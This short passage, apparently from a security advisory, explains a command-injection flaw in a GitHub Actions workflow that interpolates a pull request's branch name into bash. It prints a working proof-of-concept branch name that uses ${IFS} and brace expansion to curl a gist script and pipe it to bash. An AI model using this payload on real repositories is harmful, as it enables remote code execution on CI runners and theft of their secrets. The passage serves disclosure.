The script runs:
echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}" echo "github.ref: ${{ github.ref }}" echo "github.head_ref: ${{ github.head_ref }}" echo "github.base_ref: ${{ github.base_ref }}"
Unfortunately, because of string escaping in bash, if you run:
${{ github.event.pull_request.head.ref }}
And someone makes a pull request with this branch name (I didn’t even know git let you name branches like this):
Hacked";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash
You get code injection.
This is security advisory: